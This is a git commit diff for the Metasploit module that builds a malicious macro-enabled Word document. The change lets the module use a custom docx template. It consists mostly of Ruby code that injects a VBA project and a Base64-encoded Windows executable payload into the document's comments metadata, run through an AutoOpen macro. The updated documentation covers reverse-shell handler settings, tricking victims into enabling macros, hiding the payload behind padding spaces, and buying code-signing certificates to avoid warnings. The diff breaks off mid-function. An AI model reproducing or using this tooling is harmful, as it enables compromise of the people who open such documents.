Update office_word_macro exploit to support template injection
parent
e4ea618edf
commit
ee13195760
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
|
|
|
@ -0,0 +1,13 @@
|
||||||
|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||||
|
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
|
||||||
|
<dc:title/>
|
||||||
|
<dc:subject/>
|
||||||
|
<dc:creator/>
|
||||||
|
<cp:keywords/>
|
||||||
|
<dc:description></dc:description>
|
||||||
|
<cp:lastModifiedBy>Nobody</cp:lastModifiedBy>
|
||||||
|
<cp:revision>1</cp:revision>
|
||||||
|
<dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
|
||||||
|
<dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
|
||||||
|
<cp:category/>
|
||||||
|
</cp:coreProperties>
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>105</TotalTime><Pages>1</Pages><Words>1</Words><Characters>10</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>10</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>15.0000</AppVersion></Properties>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Windows User</dc:creator><cp:keywords></cp:keywords><dc:description> PAYLOADGOESHERE</dc:description><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>32</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T20:39:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-02T22:26:00Z</dcterms:modified></cp:coreProperties>
|
|
Binary file not shown.
|
@ -1,2 +1,2 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||||
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
|
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
|
Binary file not shown.
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00A31ED0" w:rsidRDefault="00366A6C"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r><w:t>DOCBODYGOESHER</w:t></w:r></w:p><w:sectPr w:rsidR="00A31ED0"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="0075759D"/><w:rsid w:val="000446F5"/><w:rsid w:val="00364989"/><w:rsid w:val="00366A6C"/><w:rsid w:val="003925D3"/><w:rsid w:val="00472204"/><w:rsid w:val="004929CB"/><w:rsid w:val="004937C6"/><w:rsid w:val="004E70C7"/><w:rsid w:val="00556042"/><w:rsid w:val="005C1470"/><w:rsid w:val="00634AFC"/><w:rsid w:val="0075759D"/><w:rsid w:val="008352C1"/><w:rsid w:val="008D18EE"/><w:rsid w:val="008F274A"/><w:rsid w:val="009337EB"/><w:rsid w:val="00965754"/><w:rsid w:val="00A31ED0"/><w:rsid w:val="00AA0D43"/><w:rsid w:val="00BD14BB"/><w:rsid w:val="00C22BA6"/><w:rsid w:val="00D4037B"/><w:rsid w:val="00DD6E1E"/><w:rsid w:val="00E636EA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w15:chartTrackingRefBased/><w15:docId w15:val="{0E28A8EC-7E3E-41BD-9D1E-ADE8B995AEE4}"/></w:settings>
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
Binary file not shown.
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>
|
|
|
@ -1,13 +1,16 @@
|
||||||
|
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
This module generates a macro-enabled Microsoft Office Word document. It does not target a specific
|
This module generates a macro-enabled Microsoft Office Word document (docm). It does not target a
|
||||||
CVE or vulnerability, this is more of a feature-abuse in Office, however this type of
|
specific CVE or vulnerability, instead it's more of a feature-abuse in Office, and yet it's still a
|
||||||
social-engineering attack still remains common today.
|
popular type of social-engineering attack such as in ransomware.
|
||||||
|
|
||||||
There are many ways to create this type of malicious doc. The module injects the Base64-encoded
|
By default, the module uses a built-in Office document (docx) as the template. It injects the
|
||||||
payload in the comments field, which will get decoded back by the macro and executed as a Windows
|
Base64-encoded payload into the comments field, which will get decoded back by the macro and executed
|
||||||
executable when the Office document is launched.
|
as a Windows executable when the Office document is launched.
|
||||||
|
|
||||||
|
If you do not wish to use the built-in docx template, you can also choose your own. Please see more
|
||||||
|
details below.
|
||||||
|
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
@ -22,58 +25,74 @@ Specifically, this module was tested specifically against:
|
||||||
* Microsoft Office 2016.
|
* Microsoft Office 2016.
|
||||||
* Microsoft Office Word 15.29.1 (161215).
|
* Microsoft Office Word 15.29.1 (161215).
|
||||||
|
|
||||||
|
## Building the Office Document Template
|
||||||
|
|
||||||
|
It is recommended that you build your Office document (docx) template from either one of these
|
||||||
|
applications:
|
||||||
|
|
||||||
|
* Google Docs
|
||||||
|
* Microsoft Office Word
|
||||||
|
|
||||||
|
**Google Docs**
|
||||||
|
|
||||||
|
Google Docs is ideal in case you don't have Microsoft Office available.
|
||||||
|
|
||||||
|
Before you start, make sure you have a Gmail account.
|
||||||
|
|
||||||
|
Next, to create a new document, please go to the following:
|
||||||
|
|
||||||
|
[https://docs.google.com/document/?usp=mkt_docs](https://docs.google.com/document/?usp=mkt_docs)
|
||||||
|
|
||||||
|
To save the document as a docx on Google docs:
|
||||||
|
|
||||||
|
1. Click on File
|
||||||
|
2. Go to Download as
|
||||||
|
3. Click on Microsoft Word (.docx)
|
||||||
|
|
||||||
|
**Microsoft Office Word**
|
||||||
|
|
||||||
|
If you already have Microsoft Office, you can use it to create a docx file and use it as a template.
|
||||||
|
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
**To use the default template**
|
||||||
|
|
||||||
1. ```use exploit/multi/fileformat/office_word_macro```
|
1. ```use exploit/multi/fileformat/office_word_macro```
|
||||||
2. ```set PAYLOAD [PAYLOAD NAME]```
|
2. ```set PAYLOAD [PAYLOAD NAME]```
|
||||||
3. Configure the rest of the settings accordingly (BODY, LHOST, LPORT, etc)
|
3. Configure the rest of the settings accordingly (LHOST, LPORT, etc)
|
||||||
4. ```exploit```
|
4. ```exploit```
|
||||||
5. The module should generate the malicious docm.
|
5. The module should generate the malicious docm.
|
||||||
|
|
||||||
|
**To use the custom template**
|
||||||
|
|
||||||
|
1. ```use exploit/multi/fileformat/office_word_macro```
|
||||||
|
2. ```set PAYLOAD [PAYLOAD NAME]```
|
||||||
|
3. ```set CUSTOMTEMPLATE [DOCX PATH]```
|
||||||
|
4. Configure the rest of the settings accordingly
|
||||||
|
5. ```exploit```
|
||||||
|
6. The module should generate the malicious docm.
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
**BODY** Text to put in the Office document. See **Modification** below if you wish to modify more.
|
**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
|
||||||
|
|
||||||
## Demo
|
|
||||||
|
|
||||||
In this example, first we generate the malicious docm exploit, and then we set up a
|
|
||||||
windows/meterpreter/reverse_tcp handler to receive a session. Next, we copy the docm
|
|
||||||
exploit to a Windows machine with Office 2013 installed, when the document runs the
|
|
||||||
macro, we get a session:
|
|
||||||
|
|
||||||
![macro_demo](https://cloud.githubusercontent.com/assets/1170914/22602348/751f9d66-ea08-11e6-92ce-4e52f88aaebf.gif)
|
|
||||||
|
|
||||||
## Modification
|
|
||||||
|
|
||||||
To use this exploit in a real environment, you will most likely need to modify the docm content.
|
|
||||||
Here's one approach you can do:
|
|
||||||
|
|
||||||
1. Use the module to generate the malicious docm
|
|
||||||
2. Copy the malicious docm to the vulnerable machine, and edit it with Microsoft Office (such as 2013).
|
|
||||||
When you open the document, the payload will probably do something on your machine. It's ok,
|
|
||||||
since you generated it, it should not cause any problems for you.
|
|
||||||
3. Save the doc, and test again to make sure the payload still works.
|
|
||||||
|
|
||||||
While editing, you should avoid modifying the following unless you are an advanced user:
|
|
||||||
|
|
||||||
* The comments field. If you have to modify this, make sure to create 55 empty spaces
|
|
||||||
in front of the payload string. The blank space is for making the payload less obvious
|
|
||||||
at first sight if the user views the file properties.
|
|
||||||
* The VB code in the macro.
|
|
||||||
|
|
||||||
## Trusted Document
|
## Trusted Document
|
||||||
|
|
||||||
By default, Microsoft Office does not execute macros automatically unless it is considered as a
|
By default, Microsoft Office does not execute macros automatically unless it is considered as a
|
||||||
trusted document. This means that if a macro is present, the user will most likely need to manually
|
trusted document. This means that if a macro is present, the user will most likely need to manually
|
||||||
click on the "Enable Content" button in order to run the macro.
|
click on the "Enable Content" or "Enable Macro" button in order to run the macro.
|
||||||
|
|
||||||
Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick
|
Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick
|
||||||
the user into allowing the macro to run. For example, making the document look like something
|
the user into allowing the macro to run. For example, making the document look like something
|
||||||
written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory).
|
written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory).
|
||||||
|
|
||||||
To truly make the macro document to run without any warnings, you must somehow figure out a way to
|
To truly make the macro document run without any warnings, you must somehow figure out a way to
|
||||||
sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts.
|
sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts.
|
||||||
|
|
||||||
|
If money is not an issue, you can easily buy a certificate on-line:
|
||||||
|
[https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html](https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html)
|
||||||
|
|
||||||
For testing purposes, another way to have a certificate is to create a self-signed one using
|
For testing purposes, another way to have a certificate is to create a self-signed one using
|
||||||
Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on
|
Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on
|
||||||
Windows:
|
Windows:
|
||||||
|
|
|
@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => "Microsoft Office Word Malicious Macro Execution",
|
'Name' => "Microsoft Office Word Malicious Macro Execution",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module generates a macro-enabled Microsoft Office Word document. The comments
|
This module injects a malicious macro into a Microsoft Office Word document (docx). The
|
||||||
metadata in the data is injected with a Base64 encoded payload, which will be
|
comments field in the metadata is injected with a Base64 encoded payload, which will be
|
||||||
decoded by the macro and execute as a Windows executable.
|
decoded by the macro and execute as a Windows executable.
|
||||||
|
|
||||||
For a successful attack, the victim is required to manually enable macro execution.
|
For a successful attack, the victim is required to manually enable macro execution.
|
||||||
|
@ -56,64 +56,226 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
OptString.new("BODY", [false, 'The message for the document body',
|
OptPath.new("CUSTOMTEMPLATE", [false, 'A docx file that will be used as a template to build the exploit']),
|
||||||
'Contents of this document are protected. Please click Enable Content to continue.'
|
OptString.new('FILENAME', [true, 'The Office document macro file (docm)', 'msf.docm'])
|
||||||
]),
|
|
||||||
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
|
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def get_file_in_docx(fname)
|
||||||
|
i = @docx.find_index { |item| item[:fname] == fname }
|
||||||
|
|
||||||
def on_file_read(short_fname, full_fname)
|
unless i
|
||||||
buf = File.read(full_fname)
|
fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
|
||||||
|
|
||||||
case short_fname
|
|
||||||
when /document\.xml/
|
|
||||||
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
|
|
||||||
when /core\.xml/
|
|
||||||
p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
|
|
||||||
b64_payload = ' ' * 55
|
|
||||||
b64_payload << Rex::Text.encode_base64(p)
|
|
||||||
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# The original filename of __rels is actually ".rels".
|
@docx.fetch(i)[:data]
|
||||||
# But for some reason if that's our original filename, it won't be included
|
|
||||||
# in the archive. So this hacks around that.
|
|
||||||
case short_fname
|
|
||||||
when /__rels/
|
|
||||||
short_fname.gsub!(/\_\_rels/, '.rels')
|
|
||||||
end
|
|
||||||
|
|
||||||
yield short_fname, buf
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def add_content_type_extension(extension, content_type)
|
||||||
|
if has_content_type_extension?(extension)
|
||||||
|
update_content_type("Types//Default[@Extension=\"#{extension}\"]", 'ContentType', content_type)
|
||||||
|
else
|
||||||
|
xml = get_file_in_docx('[Content_Types].xml')
|
||||||
|
types_node = xml.at('Types')
|
||||||
|
|
||||||
def package_docm(path)
|
unless types_node
|
||||||
zip = Rex::Zip::Archive.new
|
fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
|
||||||
|
end
|
||||||
|
|
||||||
Dir["#{path}/**/**"].each do |file|
|
child_data = "<Default Extension=\"#{extension}\" ContentType=\"#{content_type}\"/>"
|
||||||
p = file.sub(path+'/','')
|
types_node.add_child(child_data)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
if File.directory?(file)
|
def has_content_type_extension?(extension)
|
||||||
print_status("Packaging directory: #{file}")
|
xml = get_file_in_docx('[Content_Types].xml')
|
||||||
zip.add_file(p)
|
xml.at("Types//Default[@Extension=\"#{extension}\"]") ? true : false
|
||||||
else
|
end
|
||||||
on_file_read(p, file) do |fname, buf|
|
|
||||||
print_status("Packaging file: #{fname}")
|
def add_content_type_partname(part_name, content_type)
|
||||||
zip.add_file(fname, buf)
|
ctype_xml = get_file_in_docx('[Content_Types].xml')
|
||||||
|
types_node = ctype_xml.at('Types')
|
||||||
|
|
||||||
|
unless types_node
|
||||||
|
fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
|
||||||
|
end
|
||||||
|
|
||||||
|
child_data = "<Override PartName=\"#{part_name}\" ContentType=\"#{content_type}\"/>"
|
||||||
|
types_node.add_child(child_data)
|
||||||
|
end
|
||||||
|
|
||||||
|
def update_content_type(pattern, attribute, new_value)
|
||||||
|
ctype_xml = get_file_in_docx('[Content_Types].xml')
|
||||||
|
doc_xml_ctype_node = ctype_xml.at(pattern)
|
||||||
|
if doc_xml_ctype_node
|
||||||
|
doc_xml_ctype_node.attributes[attribute].value = new_value
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def add_rels_relationship(type, target)
|
||||||
|
rels_xml = get_file_in_docx('_rels/.rels')
|
||||||
|
relationships_node = rels_xml.at('Relationships')
|
||||||
|
|
||||||
|
unless relationships_node
|
||||||
|
fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
|
||||||
|
end
|
||||||
|
|
||||||
|
last_index = get_last_relationship_index_from_rels
|
||||||
|
relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
|
||||||
|
end
|
||||||
|
|
||||||
|
def add_doc_relationship(type, target)
|
||||||
|
rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
|
||||||
|
relationships_node = rels_xml.at('Relationships')
|
||||||
|
|
||||||
|
unless relationships_node
|
||||||
|
fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node.')
|
||||||
|
end
|
||||||
|
|
||||||
|
last_index = get_last_relationship_index_from_doc_rels
|
||||||
|
relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_last_relationship_index_from_rels
|
||||||
|
rels_xml = get_file_in_docx('_rels/.rels')
|
||||||
|
relationships_node = rels_xml.at('Relationships')
|
||||||
|
|
||||||
|
unless relationships_node
|
||||||
|
fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
|
||||||
|
end
|
||||||
|
|
||||||
|
relationships_node.search('Relationship').collect { |n|
|
||||||
|
n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
|
||||||
|
}.max
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_last_relationship_index_from_doc_rels
|
||||||
|
rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
|
||||||
|
relationships_node = rels_xml.at('Relationships')
|
||||||
|
|
||||||
|
unless relationships_node
|
||||||
|
fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node')
|
||||||
|
end
|
||||||
|
|
||||||
|
relationships_node.search('Relationship').collect { |n|
|
||||||
|
n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
|
||||||
|
}.max
|
||||||
|
end
|
||||||
|
|
||||||
|
def inject_macro
|
||||||
|
add_content_type_extension('bin', 'application/vnd.ms-office.vbaProject')
